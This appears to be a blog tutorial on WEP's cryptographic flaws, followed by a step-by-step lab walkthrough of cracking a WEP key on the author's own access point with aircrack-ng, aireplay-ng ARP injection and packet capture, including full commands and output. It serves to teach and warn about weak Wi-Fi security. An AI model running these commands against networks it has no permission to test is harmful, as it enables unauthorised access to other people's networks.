Playing with other people Wi-Fi part 1: The good old “WEP”
Many of us own a Wi-Fi network at home. It is great, convenient and no cables! When this technology first came to existence there were several competitors available as well (Remember DECT ? [wikipedia.org]). One of key points for the Wi-Fi developers was also to drive the cost of equipment down and they inevitably created two problems. Let me quickly talk about some basic issues in the Wi-Fi and then we will move to the practical cracking of WEP encryption. I intend to drive this article as first in the series and I will be mostly focused on the end-user practicalities and only linking to the most interesting theory articles.
Ok, so back to the Wi-Fi inherited problems. First is that the standard nearly ignored having two Wi-Fi networks operating in the same channel to make the equipment as cheap as possible. You might remember that Wi-Fi uses ethernet’s “Carrier sense multiple access with collision detection” (CDMA/CD) but extended to “Carrier sense multiple access with collision avoidance” (CDMA/CA). The extension introduced some great new messages like CTS (Clear to send) and RTS (Request to send). These control messages basically have given control of access to the channel to the access-point. Now the access-point manages all the clients to avoid collisions, but if there are two independent access-points, they pretty much do not care about each other and we are back to the old CDMA/CD system with back-off timers and retransmissions after collisions.
Second drawback is that in order to win the Wi-Fi standard race, the creators created the initial security protection called “Wired Equivalent Privacy” (or WEP [wikipedia.org]) in a rush and without any public driven testing. The wireless standard of 802.11 won the race, but soon afterwards the WEP flaws were identified and it was proved as very easily penetrated.
It is actually easy to explain why it is so vulnerable. Main point is that the encryption algorithm behind is a stream cipher that starts with a combination of your “password” and a random 24bit Initialization vector. Originally the WEP standard has given users 40bit password option and later also 104 bit password option (always add the IV to get 64bit encryption key or 128bit encryption key). Then this key always encrypts the traffic while the continuously changing IV should provide protection against reply attacks. Technically the RC4 provides a continuous stream of key bits, these bits are then mapped with XOR function to each bit of the underlining data.
But the main security fail of this mechanism is that the Initiation Vector is “only 24bit” long and cannot protect the key in a busy network. For example it is estimated that the IV loops every 5000 packets. In 2001 a passive attack was published by FLuhrer, Martin and Shamir that allowed you can only capture the packets from air and then perform this attack on them to recover a key very easily. In summary all you have to do to crack the code is to capture a very large number of packets to get large number of IVs and then start cracking the WEP key. Depending on the target network activity you can have the key in a few hours.
Furthermore, in 2007 the attack was significantly improved by a method of “arp-injection”. From this point it was no longer a passive attack and thanks to that it shortened the attack time to a few minutes. The idea is simple, it is possible to recognize ARP (Address Resolution Protocol) packets in the encrypted network without knowing the encryption key and then spoof deathentification of the originating client and re-sending the captured ARP packet back to the network. Every resended ARP enables you to capture additional IV vector by listening for a ARP reply. This is possible because the ARP packet structure is very static in nature and the ARP reply you get is always the same, only encrypted with a different IV. If you remember mathematics from school, when you get many ARP replies you essentially can construct an equation with both plain text, password as static variables, and only the IV varies. This help the cracking process by several orders of magnitude.
Contents
Practical example how to crack WEP
First, lets look what do we need for this task. For the moral and legal reasons, please get your own access-point and configure it with WEP encryption. Then we need two PCs (technically possible with one and two Wi-Fi cards, but two PCs are better). One PC will act as a client (so that it will generate traffic) and the other PC will be for the attacker simulation.
Regarding my personal hardware, I have used a a TP-Link 722n wireless card, with a great external antenna adapter and good support from the hacking tools. As a target I used my TP-Link 741ND wifi router. As a test client I have used my iPhone.
For the software needed you can go in two directions, I personally have dual-boot with BackTrack Linux. This is ubuntu based distribution designed for penetration-testing and comes with all the best selection of security auditing and penetration testing tools as well as already modified drivers to support advanced attacks like arp-injection (which is not needed for a normal user). You can also simply
download this image and start it as a live CD (or inside USB). Second option is to start your linux distribution (yes, you need one) and install aircrack-ng package (most probably test below step 0, and maybe you will have to google for your Wi-FI card if it supports at minimum a promiscuous mode of operation).
Step 0. Initialize airmon-ng and test packet injection
First check with ifconfig if your wifi card is recognized as root type “ifconfig” and look for any wlanX or athX card. Maybe if it is in shutdown state try with “ifconfig -a” and then activate it with for example “ifconfig wlanX up”. In my example the card is wlan1 (wlan0 is integrated intel Wi-Fi that is not really usable for attacks).
root@bt:~# ifconfig -a eth0 Link encap:Ethernet HWaddr 00:1c:25:91:5c:93 inet addr:192.168.10.170 Bcast:192.168.10.191 Mask:255.255.255.192 inet6 addr: fe80::21c:25ff:fe91:5c93/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:15197 errors:0 dropped:0 overruns:0 frame:0 TX packets:15980 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4836106 (4.8 MB) TX bytes:18487451 (18.4 MB) Interrupt:18 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:970 errors:0 dropped:0 overruns:0 frame:0 TX packets:970 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:69553 (69.5 KB) TX bytes:69553 (69.5 KB) wlan0 Link encap:Ethernet HWaddr 00:1f:3c:37:d1:c5 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) wlan1 Link encap:Ethernet HWaddr d8:5d:4c:91:ab:41 BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
So in the next steps we activate the airmon-ng package and this will put the wlan1 card into promiscuous mode and create virtual interface mon0 that we will use for attacks.
root@bt:~# airmon-ng start wlan1 Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1314 dhclient3 1525 dhclient3 11757 dhclient Process with PID 1525 (dhclient3) is running on interface wlan0 Interface Chipset Driver wlan1 Atheros AR9271 ath9k - [phy1] (monitor mode enabled on mon0) wlan0 Intel 3945ABG iwl3945 - [phy0]
NOTE: Sometimes the airmon-ng will tell you that there are programs running that can interfere with your network card and that you should close them. For example NetworkManager or a dhclient. Kill tham with the kill <pid> command before continuing.
Lets look at the ifconfig again and you will notice a new interface in the ifconfig output.
root@bt:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:1c:25:91:5c:93 inet addr:192.168.10.170 Bcast:192.168.10.191 Mask:255.255.255.192 inet6 addr: fe80::21c:25ff:fe91:5c93/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:15684 errors:0 dropped:0 overruns:0 frame:0 TX packets:16179 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4898437 (4.8 MB) TX bytes:18514654 (18.5 MB) Interrupt:18 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:1011 errors:0 dropped:0 overruns:0 frame:0 TX packets:1011 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:72513 (72.5 KB) TX bytes:72513 (72.5 KB) mon0 Link encap:UNSPEC HWaddr D8-5D-4C-91-AB-41-00-00-00-00-00-00-00-00-00-00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:118351 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:28476367 (28.4 MB) TX bytes:0 (0.0 B) wlan0 Link encap:Ethernet HWaddr 00:1f:3c:37:d1:c5 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) wlan1 Link encap:Ethernet HWaddr d8:5d:4c:91:ab:41 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Now lets test if the packet-injection works. It will also look around for networks on the same channel and will try to resend a few packets.
root@bt:~# aireplay-ng --test mon0 21:48:16 Trying broadcast probe requests... 21:48:16 Injection is working! 21:48:18 Found 1 APs 21:48:18 Trying directed probe requests... 21:48:19 F8:D1:11:37:C2:0E - channel: 6 - 'WEPcrackTest' 21:48:19 Ping (min/avg/max): 1.322ms/15.453ms/39.641ms Power: -88.62 21:48:19 29/30: 96%
Step 1. Find the target network using WEP.
For our little test, I have configured my access-point with single wifi called “WEPcrackTest” and let’s pretend that we didn’t know this. I would personally use inSSIDer, but there are alternatives directly on linux like “ssidsniff” or “iwlist scanning”. So for simplycity, lets try the “iwlist scanning”. You can find WEP encrypted networks if the corresponding Cell has no WPA/WPA2 mentioned and the “Encryption key:on” as indicated below.
root@bt:~# iwlist wlan1 scanning wlan1 Scan completed : Cell 01 - Address: F8:D1:11:37:C2:0E Channel:6 Frequency:2.437 GHz (Channel 6) Quality=24/70 Signal level=-86 dBm Encryption key:on ESSID:"WEPcrackTest" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000021c87180 Extra: Last beacon: 576ms ago IE: Unknown: 000C574550637261636B54657374 IE: Unknown: 010882848B960C121824 IE: Unknown: 030106 IE: Unknown: 050400010000 IE: Unknown: 0706534B20010D14 IE: Unknown: 2A0100 IE: Unknown: 32043048606C IE: Unknown: DD180050F2020101820003A4000027A4000042435E0062322F00 IE: Unknown: DD0900037F01010000FF7F IE: Unknown: DD3F0050F204104A00011010440001021047001000000000000010000000F8D11137C210103C000101104900140024E26002000101600000020001600100020001 IE: Unknown: DD050050F20500
Step 2. Start capturing IVs
Just as historically, your first need is to capture enough IVs (at least 50,000) to have a chance of cracking the WEP encryption. This process is best started in some parallel sessions so please open another terminal windows or use “screen” commands for background session. We will use the airodump-ng command with “-c 6” telling it to capture on channel 6, “–bssid” specifies the mac-address of the Access-Points radio to specifiy a target and and “-w” specifies the output file where to store the captured packets. Last parameter is the interface identifier and we use our “mon0”.
root@bt:~# airodump-ng -c 6 --bssid F8:D1:11:37:C2:0E -w ./WEP.cap mon0 CH 6 ][ Elapsed: 0 s ][ 2013-07-15 22:45 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F8:D1:11:37:C2:0E -71 100 27 0 0 6 54e. WEP WEP WEPcrackTest BSSID STATION PWR Rate Lost Frames Probe
Ok, start the capturing and leave it running until we have a lot of IVs.
Step 3. Arp Injection attack to speed IV capture.
The logic is as follows, we will do fake authentication against the access point and wait for any captured ARP packet, once we capture one we will start resending it back to the network and captured replies to our fake replies will allow us to capture large number of IVs from step 2. But for all this, we need to first associate using the aireplay-ng command as follows. “-1 0” is the attack type, in this case type 0 what is association only. “-e WEPcrackTest” is name of network to associate to, “-a F8:D1:11:37:C2:0E” is the access point mac-address again, “-h D8:5D:4C:91:AB:41” is mac-address of your wireless card (find it from the ifconfig command) and at the end is the wifi interface mon0.
root@bt:~# aireplay-ng -1 0 -e WEPcrackTest -a F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0 23:13:59 Sending Authentication Request 23:14:01 Authentication successful 23:14:03 Sending Association Request 23:14:04 Association successful :-)
Second part is start listening for ARP packets and if such packets comes, initiate retransmission. To do this we will use aireplay-ng command with attack type “-3”, wifi accesspoint is “-b F8:D1:11:37:C2:0E”, your wifi interface mac-address is “-h D8:5D:4C:91:AB:41” and we are opening this attack on interface mon0.
root@bt:~# aireplay-ng -3 -b F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0 23:22:55 Waiting for beacon frame (BSSID: F8:D1:11:37:C2:0E) on channel 6 Saving ARP requests in replay_arp-0715-232255.cap You should also start airodump-ng to capture replies. Read 290 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Great, notice the “sent 0 packets” at the end. Now we wait for some real client to connect and once he connects, the attack will start to run automatically. In summary right now you should have in one terminal running this replay attack and in another running capture from step 2.
Step 4. Simulating legal user to start ARP-reply
This step is artificial in our example as in real attack you would just leave all from previous steps running and wait for some user on the network to send ARP. To speed things in our little test, I will connect my second interface card wlan0 to the test network and generate an ARP manually. So this is how you can connect to a WEP network (notice that on this point I am telling you the key that is “apple”:
root@bt:~# iwconfig wlan0 essid WEPcrackTest root@bt:~# iwconfig wlan0 channel 6 root@bt:~# iwconfig wlan0 enc on key s:apple root@bt:~# ifconfig wlan0 up root@bt:~# dhclient wlan0 There is already a pid file /var/run/dhclient.pid with pid 9745 killed old client process, removed PID file Internet Systems Consortium DHCP Client V3.1.3 Copyright 2004-2009 Internet Systems Consortium. All rights reserved. For info, please visit https://www.isc.org/software/dhcp/ mon0: unknown hardware address type 803 mon0: unknown hardware address type 803 Listening on LPF/wlan0/00:1f:3c:37:d1:c5 Sending on LPF/wlan0/00:1f:3c:37:d1:c5 Sending on Socket/fallback DHCPREQUEST of 192.168.10.171 on wlan0 to 255.255.255.255 port 67 DHCPACK of 192.168.10.171 from 192.168.10.130 bound to 192.168.10.171 -- renewal in 111969 seconds.
Now lets have a look on the arp table, you will most probably see that the we have already resolved the default gateway after or during the DHCP negotiation, so we already have one ARP probably captured.
root@bt:~# arp -a ? (192.168.10.142) at 2c:59:e5:04:64:92 [ether] on eth0 ? (192.168.10.130) at 00:0c:42:37:40:44 [ether] on wlan0
Now check your step 3 arp-reply attack if it already captured some ARP packets are it is sending them back to the network. Most probably it will be already running crazy fast sending all those ARP requests like below!
root@bt:~# aireplay-ng -3 -b F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0 19:09:05 Waiting for beacon frame (BSSID: F8:D1:11:37:C2:0E) on channel 6 Saving ARP requests in replay_arp-0716-190905.cap You should also start airodump-ng to capture replies. Read 286478 packets (got 91977 ARP requests and 95113 ACKs), sent 95116 packets...(500 pps)
Also if you look at the capture from step 2, you will notice now that the capture rate has accelerated several times. And notice that it si “as if” coming from the host with mac-address D8:5D:4C:91:AB:41. This is our wlan0 mac-address but this large number of packets is definitely not coming from that interface.
root@bt:~# airodump-ng -c 6 --bssid F8:D1:11:37:C2:0E -w ./WEP.cap mon0 CH 6 ][ Elapsed: 4 mins ][ 2013-07-16 19:13 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F8:D1:11:37:C2:0E -45 87 2884 107421 441 6 54e. WPA WEP OPN WEPcrackTest BSSID STATION PWR Rate Lost Frames Probe F8:D1:11:37:C2:0E D8:5D:4C:91:AB:41 0 0 - 1 765 234755 F8:D1:11:37:C2:0E 00:1F:3C:37:D1:C5 -49 54e- 1e 0 1751 WEPcrackTest
Step 5, Wait and crack
Now we leave it running for a little while and we can periodically test if we already have enough IVs to crack the key. In step 2 I used the parameter -w to capture all traffic to a file called WEP.cap. You can notice that the file size is increasing over time. We will use the aircrack-ng -w -b F8:D1:11:37:C2:0E ./WEP.cap command. The -w parameter tells that we are going to attempt to crack the code from a file, -b specifies what access-points traffic is interesting for us (because you can just capture in step 2 from multiple networks at once) and at the end we specify what file to use as source of data.
root@bt:~# aircrack-ng ./WEP.cap Opening ./WEP.cap Read 1459354 packets. # BSSID ESSID Encryption 1 F8:D1:11:37:C2:0E WEPcrackTest WEP (336090 IVs) Choosing first network as target. Opening ./WEP.cap-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 337296 ivs. KEY FOUND! [ 61:70:70:6C:65 ] (ASCII: apple ) Decrypted correctly: 100%
And here you have it, “KEY FOUND!” and it is found as “ASCII: apple”. This was very easy, no ?
Concolusion
In summary for whatever reason do not operate WEP encryption on your Wi-Fi network. I know that this is an old technology and with the standards like 802.11n not having even direct support for it anymore it will eventually die. But until then, I have scanned the area around my home with a 24db antenna and I have located three WEP encrypted networks from the 27 networks around. So there are still people who can be exploited and probably have no idea about it. Make sure you are not one of them.
I am already writing a next part about cracking WPA/WPA2 using the WPS vulnerabilities.